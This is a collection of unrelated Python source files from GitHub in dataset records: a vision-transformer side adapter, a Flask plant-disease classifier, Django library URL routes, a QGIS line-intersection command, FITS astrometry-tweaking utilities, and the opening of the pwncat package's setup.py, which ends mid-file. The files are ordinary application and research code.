x in fusion_map]}\n # build fusion layers\n fusion_type: str = cfg.MODEL.SIDE_ADAPTER.FUSION_TYPE\n fusion_layers = nn.ModuleDict(\n {\n f\"layer_{tgt_idx}\": build_fusion_layer(\n fusion_type, input_shape[src_idx].channels, vit.num_features\n )\n for tgt_idx, src_idx in x2side_map.items()\n }\n )\n # build mask decoder\n return {\n \"vit_model\": vit,\n \"num_queries\": cfg.MODEL.SIDE_ADAPTER.NUM_QUERIES,\n \"fusion_layers\": fusion_layers,\n \"fusion_map\": x2side_map,\n \"mask_decoder\": MLPMaskDecoder(\n in_channels=vit.num_features,\n total_heads=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.NUM_HEADS,\n total_layers=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.NUM_LAYERS,\n embed_channels=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.EMBED_CHANNELS,\n mlp_channels=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.MLP_CHANNELS,\n mlp_num_layers=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.MLP_NUM_LAYERS,\n rescale_attn_bias=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.RESCALE_ATTN_BIAS,\n ),\n \"deep_supervision_idxs\": cfg.MODEL.SIDE_ADAPTER.DEEP_SUPERVISION_IDXS,\n }\n\n def forward(\n self, image: torch.Tensor, clip_features: List[torch.Tensor]\n ) -> Dict[str, List[torch.Tensor]]:\n features = self.forward_features(image, clip_features)\n return self.decode_masks(features)\n\n def decode_masks(\n self, features: List[Dict[str, torch.Tensor]]\n ) -> Tuple[List[torch.Tensor], List[List[torch.Tensor]]]:\n if not self.training:\n features = [features[-1]]\n mask_preds = []\n attn_biases = []\n for feature in features:\n mask_pred, attn_bias = self.mask_decoder(**feature)\n mask_preds.append(mask_pred)\n attn_biases.append(attn_bias)\n return mask_preds, attn_biases\n\n def forward_features(\n self, image: torch.Tensor, clip_features: List[torch.Tensor]\n ) -> List[Dict[str, torch.Tensor]]:\n x, (h, w) = self.vit_model.patch_embed(image)\n L = x.shape[1] # token length\n pos_embed = self.vit_model.pos_embed\n ori_h, ori_w = self.vit_model.patch_embed.grid_size\n if pos_embed.shape[1] != L:\n pos_embed = (\n F.interpolate(\n pos_embed.reshape(1, ori_h, ori_w, -1).permute(0, 3, 1, 2),\n size=[h, w],\n mode=\"bicubic\",\n align_corners=False,\n )\n .flatten(2)\n .permute(0, 2, 
1)\n )\n pos_embed = torch.cat(\n [self.query_pos_embed.expand(pos_embed.shape[0], -1, -1), pos_embed], dim=1\n )\n x = torch.cat(\n [self.query_embed.expand(x.shape[0], -1, -1), x],\n dim=1,\n ) # B, Q+L, C\n x = x + pos_embed\n x = self.vit_model.norm_pre(x)\n x = self.fuse(0, x, clip_features, (h, w))\n outs = []\n for i, blk in enumerate(self.vit_model.blocks, start=1):\n x = blk(x)\n x = self.fuse(i, x, clip_features, (h, w))\n if i in self.deep_supervision_idxs:\n outs.append(\n {\n \"query\": x[:, :-L, ...],\n \"x\": x[:, -L:, ...]\n .permute(0, 2, 1)\n .reshape(x.shape[0], x.shape[-1], h, w),\n }\n )\n\n if i < len(self.vit_model.blocks):\n x = x + pos_embed\n\n return outs\n\n def fuse(\n self,\n block_idx: int,\n x: torch.Tensor,\n clip_features: List[torch.Tensor],\n spatial_shape: Tuple[int, int],\n ) -> torch.Tensor:\n if block_idx in self.fusion_map:\n src_idx = self.fusion_map[block_idx]\n L = spatial_shape[0] * spatial_shape[1]\n x = torch.cat(\n [\n x[:, :-L, ...],\n self.fusion_layers[f\"layer_{block_idx}\"](\n x[:, -L:, ...], clip_features[src_idx], spatial_shape\n ),\n ],\n dim=1,\n )\n log_first_n(\n logging.INFO,\n f\"fuse clip {src_idx} to {block_idx}\",\n len(self.fusion_map),\n )\n return x\n","repo_name":"MendelXu/SAN","sub_path":"san/model/side_adapter/side_adapter.py","file_name":"side_adapter.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"29"} +{"seq_id":"36701265731","text":"from flask import Flask,request,jsonify,render_template\nfrom collections import OrderedDict\nimport os\nimport torch\nfrom torchvision import models,transforms\nimport numpy as np\nfrom PIL import Image\nimport io\nimport face_recognition\nimport cv2\nimport face_recognition\nfrom torch import nn\n# import six.moves.urllib as urllib\nimport sys\n\n# import tensorflow as tf\n\n\nfrom collections import defaultdict\nfrom io import StringIO\n# from matplotlib import pyplot as plt\n\nfrom PIL import Image\n# from object_detection.utils import label_map_util\n# from object_detection.utils import visualization_utils as vis_util\n\n\ndevice = torch.device('cpu')\n\ndef transform_image(image_bytes):\n my_transforms = transforms.Compose([transforms.RandomRotation(45),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], \n [0.229, 0.224, 0.225])])\n image = Image.open(io.BytesIO(image_bytes))\n return my_transforms(image).unsqueeze(0)\n\n\ndef predict_transfer(image,model):\n # load the image and return the predicted breed\n# mean_train_set,std_train_set = [0.487,0.467,0.397],[0.235,0.23,0.23]\n \n# image_transforms= transforms.Compose([transforms.Resize(256),\n# transforms.CenterCrop(224),\n# transforms.ToTensor(),\n# transforms.Normalize(mean_train_set,std_train_set)])\n image_tensor = transform_image(image)\n# image_tensor.unsqueeze_(0)\n# if use_cuda:\n# image_tensor = image_tensor.cuda()\n model.eval()\n model.to(device)\n image_tensor.to(device)\n output = model(image_tensor)\n _,class_idx=torch.max(output, 1)\n \n class_name={0: 'Apple___Apple_scab',\n 1: 'Apple___Black_rot',\n 2: 'Apple___Cedar_apple_rust',\n 3: 'Apple___healthy',\n 4: 'Blueberry___healthy',\n 5: 'Cherry_(including_sour)___Powdery_mildew',\n 6: 'Cherry_(including_sour)___healthy',\n 7: 'Corn_(maize)___Cercospora_leaf_spot Gray_leaf_spot',\n 8: 'Corn_(maize)___Common_rust_',\n 9: 'Corn_(maize)___Northern_Leaf_Blight',\n 10: 
'Corn_(maize)___healthy',\n 11: 'Grape___Black_rot',\n 12: 'Grape___Esca_(Black_Measles)',\n 13: 'Grape___Leaf_blight_(Isariopsis_Leaf_Spot)',\n 14: 'Grape___healthy',\n 15: 'Orange___Haunglongbing_(Citrus_greening)',\n 16: 'Peach___Bacterial_spot',\n 17: 'Peach___healthy',\n 18: 'Pepper,_bell___Bacterial_spot',\n 19: 'Pepper,_bell___healthy',\n 20: 'Potato___Early_blight',\n 21: 'Potato___Late_blight',\n 22: 'Potato___healthy',\n 23: 'Raspberry___healthy',\n 24: 'Soybean___healthy',\n 25: 'Squash___Powdery_mildew',\n 26: 'Strawberry___Leaf_scorch',\n 27: 'Strawberry___healthy',\n 28: 'Tomato___Bacterial_spot',\n 29: 'Tomato___Early_blight',\n 30: 'Tomato___Late_blight',\n 31: 'Tomato___Leaf_Mold',\n 32: 'Tomato___Septoria_leaf_spot',\n 33: 'Tomato___Spider_mites Two-spotted_spider_mite',\n 34: 'Tomato___Target_Spot',\n 35: 'Tomato___Tomato_Yellow_Leaf_Curl_Virus',\n 36: 'Tomato___Tomato_mosaic_virus',\n 37: 'Tomato___healthy'}\n return class_name[int(class_idx)]\n\n\napp = Flask(__name__, static_url_path='/static')\n\n@app.route('/')\ndef home():\n\treturn render_template(\"index.html\")\n\n\n@app.route('/about')\ndef render_about_page():\n\treturn render_template('about.html')\n\n# @app.route(\"/upload-image\", methods=[\"GET\", \"POST\"])\n# def upload_image():\n@app.route('/uploadajax',methods=['POST'])\ndef upload_file():\n\tif request.method == \"POST\":\n\t\tif request.files:\n\t\t\timage = request.files[\"file\"]\n\t\t\timage_bytes = image.read()\n\t\t\timage_extensions=['ras', 'xwd', 'bmp', 'jpe', 'jpg', 'jpeg', 'xpm', 'ief', 'pbm', 'tif', 'gif', 'ppm', 'xbm', 'tiff', 'rgb', 'pgm', 'png', 'pnm']\n\t\t\tdevice = torch.device('cpu')\n\t\t\tmodel = models.densenet121(pretrained=True)\n\t\t\tclassifier = nn.Sequential(OrderedDict([\n ('fc1', nn.Linear(1024, 500)),\n ('relu', nn.ReLU()),\n ('drop1',nn.Dropout(p=0.5)),\n ('fc2', nn.Linear(500, 38)),\n ('output', nn.LogSoftmax(dim=1))\n ]))\n\t\t\tmodel.classifier = classifier\n\t\t\tmodel.load_state_dict(torch.load(\"Model/model_plant_modified.pt\",map_location=device))\n\t\t\t\n# \t\t\tmodel = torch.load(\"Model/model_plant.pt\",map_location=device)\n\t\t\tdisease = predict_transfer(image_bytes,model)\n\t\t\treturn jsonify('This a disease picture of:{}'.format(disease))\n# \t\t\tmodel = torch.load(\"Model/model_plant.pt\")\n\t\t\n\n \n \n\n\t\t\t\n\n# \t\timage = request.files[\"image\"]\n\t\t\t\n \t\t\t\n\t\t\t\n# \tif request.method == \"POST\":\n# \t\tfile = request.files['image']\n \t\t\t\n# \t\t\tif image.filename.split('.')[1] not in image_extensions:\n# \t\t\t\treturn jsonify('Please upload an appropriate image file')\n\n\t\n# \t\t\timage_bytes = image.read()\n# \t\t\tpil_image = Image.open(io.BytesIO(image_bytes))\n \n# \t\t\tnparr = np.frombuffer(image_bytes, np.uint8)\n# \t\t\timg_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n \n \n# \t\tdisease = predict_transfer(pil_image,model)\n \t\n \n \n\t\n\t\n\n\n\nif __name__ == '__main__':\n app.run(debug=False,port=os.getenv('PORT',5000))\n\n","repo_name":"VIKGO123/Plant-Disease-Recoginition","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28929358083","text":"from django.urls import path\n\nfrom django.contrib import admin\nfrom django.conf.urls import url\nfrom MyBook import views,forms\n\nfrom django.conf import settings\nfrom django.views.static import serve\nfrom django.conf.urls import include\n\n\nurlpatterns = [\n url(r'^admin/', 
admin.site.urls),\n    url(r'^index/$',views.home),\n    url(r'^([0-9]+)/$',views.details,name='details'),\n    url(r'^details/([0-9]+)/$',views.delete,name='delete'),\n\n    url(r'^ajouter/([0-9]+)/$',forms.UpdateView.as_view(),name='update'),\n    url(r'^user/(\\w+)/$', views.profile, name='profile'),\n    url(r'^ajouter/$', views.ajouter, name='ajouter'),\n    url(r'^ajouter/back/$',views.back,name=\"back\"),\n    url(r'^$',views.login_view,name='login'),\n    url(r'^logout/$',views.logout_view,name='logout'),\n    url(r'^like_book/$', views.like_book, name='like_book'),\n\n    url(r'^update/(\\d+)/$', views.Bookupdate,name=\"update\"),\n    url(r'^signIn/$',views.signIn,name=\"signIn\"),\n    url(r'^user_list/$', views.user_list, name='user_list'),\n    url(r'^user_update/([0-9]+)/$', views.User_update, name='User_update'),\n    url(r'^user_list/([0-9]+)/$',views.delete_user,name='delete_user'),\n    url(r'^user_search$', views.user_search, name=\"user_search\"),\n    url(r'^user_add$', views.user_add, name=\"user_add\"),\n    url(r'^borrow/([0-9]+)/$', views.book_borrow, name='book_borrow'),\n    url(r'^return/([0-9]+)/$', views.book_return, name='book_return'),\n    url(r'^comment/([0-9]+)/$', views.book_comment, name='book_comment'),\n\n]\n\n\n","repo_name":"Mokhleshamdi/openBooks","sub_path":"MyBook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16233324895","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\nfrom qgis.gui import *\nimport processing\nimport os\nimport tempfile\nimport shutil\n\nfrom messagebarutils import MessageBarUtils\nimport vectorlayerutils\nimport constants\n\nclass IntersectCommand(object):\n    \n    def __init__(self, iface):\n        self.iface = iface\n        self.messageBarUtils = MessageBarUtils(iface)\n    \n    def run(self):\n        self.layer = self.iface.legendInterface().currentLayer()\n        \n        if self.layer.isModified():\n            self.messageBarUtils.showMessage(\"Intersect\", \"Commit current changes in layer before running this command.\", \n                                              QgsMessageBar.CRITICAL, duration=5)\n            return\n        \n        if self.layer.selectedFeatureCount() == 0:\n            self.messageBarUtils.showYesCancel(\"Intersect\", \"No feature selected in Layer %s. Proceed on full layer?\" % self.layer.name(), \n                                              QgsMessageBar.WARNING, self.intersect)\n            return\n        \n        # run directly without asking anything\n        self.intersect()\n    \n    def intersect(self):\n        self.layer.beginEditCommand(\"Intersect\")\n        \n        tempDir = None\n        try:\n            self.iface.mapCanvas().freeze(True)\n            \n            if self.layer.selectedFeatureCount() > 0:\n                selected=True\n                concernedFids = self.layer.selectedFeaturesIds()\n            else:\n                concernedFids = self.layer.allFeatureIds()\n                selected=False\n            \n            \n            tempDir = tempfile.mkdtemp()\n            shpPath = os.path.join(tempDir, \"temp.shp\")\n            # not really necessary if no selection....\n            QgsVectorFileWriter.writeAsVectorFormat(self.layer, shpPath, self.layer.dataProvider().encoding(), \n                                                     self.layer.crs(), onlySelected=selected)\n            \n            # here run own implementation of intersection instead of v:clean break => v.clean break applies a threshold\n            # that merges vertices closer than 10^-4 to each other (no matter the unit), which is a problem for \n            # geographic coordinates (10^-4 deg ~ 100m at equator). 
Possible to reproject instead but intersections not exactly where\n # they would have been (line in WGS84 is not a line in Mercator but reproject only reprojects the endpoint) \n # and someone would have complained (even though at the scale we work at; it would have been a distortion < 1mmm)\n # To consider if the method below is too slow...\n layer = QgsVectorLayer(shpPath, \"Temp\", \"ogr\")\n \n self.iface.mainWindow().statusBar().showMessage(\"Layer Intersection\")\n \n layer.startEditing()\n vectorlayerutils.layerIntersection(layer)\n layer.commitChanges() \n \n self.iface.mainWindow().statusBar().showMessage(\"v.clean snap\")\n \n # v.clean Snap\n # will make sure the nodes snapped to a segment are taken into account\n # tolerance set to close to floating precision\n output = processing.runalg(\"grass:v.clean\",layer,1,constants.TOLERANCE_DEGREE,None,-1,0.0001,None,None)\n outputLayer = output['output']\n \n # here selection has been lost but not a problem in practice\n \n \n self.iface.mainWindow().statusBar().showMessage(\"v.clean rmdupl\")\n \n # v.clean rmdupl\n output = processing.runalg(\"grass:v.clean\",outputLayer,6,0,None,-1,0.0001,None,None)\n outputLayer = output['output']\n \n \n self.iface.mainWindow().statusBar().showMessage(\"v.clean rmline\")\n \n # v.clean rmline\n output = processing.runalg(\"grass:v.clean\",outputLayer,11,0,None,-1,0.0001,None,None)\n outputLayer = output['output']\n \n outputLayer = QgsVectorLayer(outputLayer, \"Repr\", \"ogr\")\n \n self.iface.mainWindow().statusBar().showMessage(\"output\")\n \n # copy output features\n count = outputLayer.featureCount()\n qDebug(\"Count %d\" % count)\n if count == 0:\n self.messageBarUtils.showMessage(\"Intersect\", \"No feature output.\", QgsMessageBar.WARNING, duration=5)\n else:\n # delete original selected features\n for featureId in concernedFids:\n self.layer.deleteFeature(featureId)\n \n for feature in outputLayer.getFeatures():\n geom = feature.geometry()\n feature.setGeometry(geom)\n self.layer.addFeature(feature)\n if selected:\n self.layer.select(feature.id())\n \n del outputLayer\n \n except Exception as e:\n QgsMessageLog.logMessage(repr(e))\n self.messageBarUtils.removeAllMessages()\n self.messageBarUtils.showMessage(\"Intersect\", \"There was an error performing this command. 
See QGIS Message log for details.\", \n                                             QgsMessageBar.CRITICAL, duration=5)\n            \n            self.layer.destroyEditCommand()\n            \n            return\n        finally:\n            if tempDir:\n                shutil.rmtree(tempDir, True)\n            self.iface.mapCanvas().freeze(False)\n            self.iface.mapCanvas().refresh()\n        \n        self.messageBarUtils.showMessage(\"Intersect\", \"Success\", duration=5)\n        \n        self.layer.endEditCommand()\n        \n","repo_name":"gvellut/GVDigitizingTools","sub_path":"intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27512381912","text":"# Code by Lachlan Marnoch, 2019\n\nfrom astropy import table\nfrom astropy.io import fits\nfrom astropy import wcs\nfrom astropy.coordinates import SkyCoord\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom craftutils import fits_files as ff\nfrom craftutils import params as p\nfrom craftutils import utils as u\nfrom craftutils import plotting as pl\n\nfrom typing import Union\n\n\ndef calculate_error_ellipse(frb: Union[str, dict], error: str = 'quadrature'):\n    \"\"\"\n    Calculates the parameters of the uncertainty ellipse of an FRB, for use in plotting.\n    :param frb: Either a string specifying the FRB, which must have a corresponding .yaml file in /param/FRBs, or a\n    dictionary containing the same information.\n    :param error: String specifying the type of error calculation to use. Available options are 'quadrature', which\n    provides the quadrature sum of statistical and systematic uncertainty; 'systematic'; and 'statistical'.\n    :return: (a, b, theta) as floats in a tuple, in units of degrees.\n    \"\"\"\n    # resolve a string identifier to its parameter dictionary before any branch uses it\n    if type(frb) is str:\n        frb = p.object_params_frb(frb)\n\n    if error == 'quadrature':\n\n        if frb['burst_err_stat_a'] == 0.0 or frb['burst_err_stat_b'] == 0.0:\n\n            ra_frb = frb['burst_ra']\n            dec_frb = frb['burst_dec']\n\n            ra_stat = frb['burst_err_stat_ra']\n            ra_sys = frb['burst_err_sys_ra']\n            ra = np.sqrt(ra_stat ** 2 + ra_sys ** 2)\n\n            a = SkyCoord(f'0h0m0s {dec_frb}d').separation(SkyCoord(f'0h0m{ra}s {dec_frb}d')).value\n\n            dec_stat = frb['burst_err_stat_dec'] / 3600\n            dec_sys = frb['burst_err_sys_dec'] / 3600\n            dec = np.sqrt(dec_stat ** 2 + dec_sys ** 2)\n            b = SkyCoord(f'{ra_frb}d {dec_frb}d').separation(SkyCoord(f'{ra_frb}d {dec_frb + dec}d')).value\n\n            theta = 0.0\n\n        else:\n\n            a_stat = frb['burst_err_stat_a']\n            a_sys = frb['burst_err_sys_a']\n            a = np.sqrt(a_stat ** 2 + a_sys ** 2) / 3600\n\n            b_stat = frb['burst_err_stat_b']\n            b_sys = frb['burst_err_sys_b']\n            b = np.sqrt(b_stat ** 2 + b_sys ** 2) / 3600\n\n            theta = frb['burst_err_theta']\n\n    elif error == 'systematic':\n\n        if frb['burst_err_stat_a'] == 0.0 or frb['burst_err_stat_b'] == 0.0:\n\n            ra_frb = frb['burst_ra']\n            dec_frb = frb['burst_dec']\n\n            ra_sys = frb['burst_err_sys_ra']\n\n            a = SkyCoord(f'0h0m0s {dec_frb}d').separation(SkyCoord(f'0h0m{ra_sys}s {dec_frb}d')).value\n\n            dec_sys = frb['burst_err_sys_dec'] / 3600\n            b = SkyCoord(f'{ra_frb}d {dec_frb}d').separation(SkyCoord(f'{ra_frb}d {dec_frb + dec_sys}d')).value\n\n            theta = 0.0\n\n        else:\n            a = frb['burst_err_sys_a'] / 3600\n            b = frb['burst_err_sys_b'] / 3600\n            theta = frb['burst_err_theta']\n\n    elif error == 'statistical':\n\n        if frb['burst_err_stat_a'] == 0.0 or frb['burst_err_stat_b'] == 0.0:\n\n            ra_frb = frb['burst_ra']\n            dec_frb = frb['burst_dec']\n\n            ra_stat = frb['burst_err_stat_ra']\n\n            a = SkyCoord(f'0h0m0s {dec_frb}d').separation(SkyCoord(f'0h0m{ra_stat}s {dec_frb}d')).value\n\n            dec_stat = frb['burst_err_stat_dec'] / 3600\n            b = 
SkyCoord(f'{ra_frb}d {dec_frb}d').separation(SkyCoord(f'{ra_frb}d {dec_frb + dec_stat}d')).value\n\n theta = 0.0\n\n else:\n a = frb['burst_err_stat_a'] / 3600\n b = frb['burst_err_stat_b'] / 3600\n theta = frb['burst_err_theta']\n\n else:\n raise ValueError('error type not recognised.')\n\n # print(a * 3600)\n # print(b * 3600)\n\n return a, b, theta\n\n\ndef offset_astrometry(hdu: fits.hdu, offset_ra: float, offset_dec: float, output: str):\n \"\"\"\n Offsets the astrometric solution of a fits HDU by the specified amounts.\n :param hdu: Astropy HDU object to be offset.\n :param offset_ra: Amount to offset Right Ascension by, in degrees.\n :param offset_dec: Amount to offset Declination by, in degrees.\n :param output: String specifying the output directory.\n :return:\n \"\"\"\n hdu, path = ff.path_or_hdu(hdu)\n print(offset_ra, offset_dec)\n print('Writing tweaked file to:')\n print('\\t', output)\n print(hdu[0].header['CRVAL1'], hdu[0].header['CRVAL2'])\n hdu[0].header['CRVAL1'] = hdu[0].header['CRVAL1'] - offset_ra\n hdu[0].header['CRVAL2'] = hdu[0].header['CRVAL2'] - offset_dec\n print(hdu[0].header['CRVAL1'], hdu[0].header['CRVAL2'])\n\n hdu.writeto(output, overwrite=True)\n\n if path:\n hdu.close()\n\n return hdu\n\n\ndef tweak(sextractor_path: str, destination: str, image_path: str, cat_path: str, cat_name: str, tolerance: float = 10.,\n show: bool = False,\n stars_only: bool = False,\n manual: bool = False, offset_x: float = None, offset_y: float = None, offsets_world: bool = False,\n psf: bool = True,\n specific_star: bool = False, star_ra: float = None, star_dec: float = None\n ):\n \"\"\"\n For tweaking the astrometric solution of a fits image using a catalogue; either matches as many stars as possible\n and uses the median offset, uses a single star at a specified position (specific_star=True) or a manual offset.\n :param sextractor_path: Path to SExtractor-generated catalogue.\n :param destination: Directory to write tweaked image to.\n :param image_path: Path to image FITS file\n :param cat_path: Path to file containing catalogue.\n :param cat_name: Name of catalogue used.\n :param tolerance: Tolerance, in pixels, within which matches will be accepted.\n :param show: Plot matches onscreen?\n :param stars_only: Only match using stars, determined using SExtractor's 'class_star' output.\n :param manual: Use manual offset?\n :param offset_x: Offset in x to use; only if 'manual' is set to True.\n :param offset_y: Offset in y to use; only if 'manual' is set to True.\n :param offsets_world: If True, interprets the offsets as being given in World Coordinates (RA and DEC)\n :param psf: Use the PSF-fitting position?\n :param specific_star: Use a specific star to tweak? 
This means, instead of finding the closest matches for many\n stars, alignment is attempted with a single star nearest the given position.\n :param star_ra: Right Ascension of star for single-star alignment.\n :param star_dec: Declination of star for single-star alignment.\n :return: None\n \"\"\"\n param_dict = {}\n\n print(image_path)\n image = fits.open(image_path)\n header = image[0].header\n data = image[0].data\n\n wcs_info = wcs.WCS(header=header)\n # Set the appropriate column names depending on the format of the catalogue to use.\n if cat_name == 'DES':\n ra_name = 'RA'\n dec_name = 'DEC'\n elif cat_name == 'Gaia' or cat_name == 'SDSS':\n ra_name = 'ra'\n dec_name = 'dec'\n else:\n if psf:\n ra_name = 'ra_psf'\n dec_name = 'dec_psf'\n else:\n ra_name = 'ra'\n dec_name = 'dec'\n\n if psf:\n names = p.sextractor_names_psf()\n sextractor_ra_name = 'ra_psf'\n sextractor_dec_name = 'dec_psf'\n\n else:\n names = p.sextractor_names()\n sextractor_ra_name = 'ra'\n sextractor_dec_name = 'dec'\n\n if show or not manual:\n if cat_name == 'SExtractor':\n cat = table.Table(np.genfromtxt(cat_path, names=names))\n else:\n cat = table.Table()\n cat = cat.read(cat_path, format='ascii.csv')\n\n sextracted = table.Table(np.genfromtxt(sextractor_path, names=names))\n if stars_only:\n sextracted = sextracted[sextracted['class_star'] > 0.9]\n\n cat['x'], cat['y'] = wcs_info.all_world2pix(cat[ra_name], cat[dec_name], 0)\n x, y = wcs_info.all_world2pix(sextracted[sextractor_ra_name], sextracted[sextractor_dec_name], 0)\n\n norm = pl.nice_norm(data)\n if show:\n # plt.subplot(projection=wcs_info)\n plt.imshow(data, norm=norm, origin='lower', cmap='viridis')\n plt.scatter(x, y, label='SExtractor', c='violet')\n plt.scatter(cat['x'], cat['y'], label=cat_name, c='red')\n plt.legend()\n plt.title('Pre-Correction')\n plt.show()\n\n if manual:\n\n if offset_x is not None and offset_y is not None:\n\n if not offsets_world:\n\n scale_ra, scale_dec = ff.get_pixel_scale(image)\n\n offset_ra = -offset_x * abs(scale_ra)\n offset_dec = -offset_y * abs(scale_dec)\n\n print(offset_x, offset_y)\n\n else:\n\n offset_ra = offset_x\n offset_dec = offset_y\n\n else:\n\n print('Set offsets in epoch .yaml file')\n\n offset_ra = offset_dec = None\n\n elif specific_star:\n\n if star_ra is not None and star_dec is not None:\n print(star_ra, star_dec)\n star_cat, d = u.find_object(x=star_ra, y=star_dec, x_search=cat[ra_name], y_search=cat[dec_name])\n print('MD:', d)\n star_cat = cat[star_cat]\n star_sex, d = u.find_object(x=star_ra, y=star_dec, x_search=sextracted[sextractor_ra_name],\n y_search=sextracted[sextractor_dec_name])\n print('MD:', d)\n star_sex = sextracted[star_sex]\n offset_ra = (star_sex[sextractor_ra_name] - star_cat[ra_name])\n offset_dec = (star_sex[sextractor_dec_name] - star_cat[dec_name])\n else:\n raise ValueError('If doing specific_star, must specify star_ra and star_dec')\n\n else:\n\n match_ids, match_ids_cat = u.match_cat(x_match=sextracted['x'], y_match=sextracted['y'],\n x_cat=cat['x'],\n y_cat=cat['y'], tolerance=tolerance)\n\n sextracted = sextracted[match_ids]\n cat = cat[match_ids_cat]\n\n offsets_ra = sextracted[sextractor_ra_name] - cat[ra_name]\n offsets_dec = sextracted[sextractor_dec_name] - cat[dec_name]\n\n offset_ra = np.nanmedian(offsets_ra)\n offset_dec = np.nanmedian(offsets_dec)\n\n # TODO: This is quick and dirty and will only work if the image is approximately oriented along x=RA\n # and y=DEC (CROTA ~ 0)\n\n if offset_ra is not None and offset_dec is not None:\n\n 
param_dict['offset_ra'] = float(offset_ra)\n param_dict['offset_dec'] = float(offset_dec)\n\n image = offset_astrometry(hdu=image, offset_ra=offset_ra, offset_dec=offset_dec, output=destination)\n\n if show and not manual:\n wcs_info = wcs.WCS(header=header)\n cat['x'], cat['y'] = wcs_info.all_world2pix(cat[ra_name], cat[dec_name], 0)\n x, y = wcs_info.all_world2pix(sextracted[sextractor_ra_name] - offset_ra,\n sextracted[sextractor_dec_name] - offset_dec, 0)\n\n if show:\n plt.subplot(projection=wcs_info)\n plt.imshow(data, norm=norm, origin='lower', cmap='viridis')\n plt.scatter(x, y, label='SExtractor', c='violet')\n plt.scatter(cat['x'], cat['y'], label=cat_name, c='red')\n plt.legend()\n plt.title('Post-Correction')\n plt.show()\n\n image.close()\n return param_dict\n\n\ndef tweak_final(sextractor_path: str, destination: str,\n epoch: str, instrument: str,\n show: bool, tolerance: float = 10.,\n output_suffix: str = 'astrometry', input_suffix='coadded',\n stars_only: bool = False, path_add: str = 'subtraction_image',\n manual: bool = False, specific_star: bool = False):\n \"\"\"\n A wrapper for tweak, to interface with the .yaml param files and provide offsets to all filters used in an\n observation.\n :param sextractor_path: Path to SExtractor-generated catalogue.\n :param destination: Directory to write tweaked image to.\n :param epoch: The epoch number of the observation to be tweaked.\n :param instrument: The instrument on which the observation was taken.\n :param show: Plot matches onscreen?\n :param tolerance: Tolerance, in pixels, within which matches will be accepted.\n :param output_suffix: String to append to filename of output file.\n :param input_suffix: Suffix appended to filenmae of input file.\n :param stars_only: Only match using stars, determined using SExtractor's 'class_star' output.\n :param path_add: Key under which to add the output path in the 'output_paths.yaml' file.\n :param manual: Use manual offset?\n :param specific_star: Use a specific star to tweak? 
This means, instead of finding the closest matches for many\n stars, alignment is attempted with a single star nearest the given position.\n :return: None\n \"\"\"\n u.mkdir_check(destination)\n properties = p.object_params_instrument(obj=epoch, instrument=instrument)\n frb_properties = p.object_params_frb(obj=epoch[:-2])\n cat_name = properties['cat_field_name']\n manual = properties['manual_astrometry'] and manual\n cat_path = frb_properties['data_dir'] + cat_name.upper() + \"/\" + cat_name.upper() + \".csv\"\n\n if cat_path is not None:\n\n outputs = p.object_output_params(obj=epoch, instrument=instrument)\n filters = outputs['filters']\n\n param_dict = {}\n\n for filt in filters:\n\n print(filt)\n\n f = filt[0]\n\n if manual:\n\n offset_x = properties[f + '_offset_x']\n offset_y = properties[f + '_offset_y']\n\n else:\n offset_x = None\n offset_y = None\n\n if specific_star:\n burst_properties = p.object_params_frb(epoch[:-2])\n star_ra = burst_properties['alignment_ra']\n star_dec = burst_properties['alignment_dec']\n\n else:\n star_ra = star_dec = None\n\n param = tweak(sextractor_path=sextractor_path + f + '_psf-fit.cat',\n destination=destination + f + '_' + output_suffix + '.fits',\n image_path=destination + f + '_' + input_suffix + '.fits',\n cat_path=cat_path,\n cat_name=cat_name, tolerance=tolerance, show=show, stars_only=stars_only, manual=manual,\n offset_x=offset_x, offset_y=offset_y, specific_star=specific_star, star_ra=star_ra,\n star_dec=star_dec)\n\n for par in param:\n param_dict[f + '_' + par] = param[par]\n\n p.add_output_path(obj=epoch, key=f + '_' + path_add,\n path=destination + f + '_' + output_suffix + '.fits',\n instrument=instrument)\n\n p.add_params(properties['data_dir'] + 'output_values.yaml', params=param_dict)\n\n else:\n print('No catalogue found for this alignment.')\n","repo_name":"Lachimax/craftutils","sub_path":"src/craftutils/astrometry.py","file_name":"astrometry.py","file_ext":"py","file_size_in_byte":14950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30862889896","text":"\"\"\"Pip configuration.\"\"\"\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"pwncat\",\n version=\"0.1.2\",\n description=\"Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell and port forwarding magic - and its fully scriptable with Python (PSE).\",\n license=\"MIT\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"cytopia\",\n author_email=\"cytopia@everythingcli.org\",\n url=\"https://pwncat.org/\",\n install_requires=[],\n scripts=[\n \"bin/pwncat\"\n ],\n project_urls={\n 'Source Code': 'https://github.com/cytopia/pwncat',\n 'Documentation': 'https://docs.pwncat.org/',\n 'Bug Tracker': 'https://github.com/cytopia/pwncat/issues',\n },\n classifiers=[\n # https://pypi.org/classifiers/\n #\n # How mature is this project\n \"Development Status :: 4 - Beta\",\n # Indicate who your project is intended for\n \"Intended Audience :: Developers\",\n \"Intended Audience :: 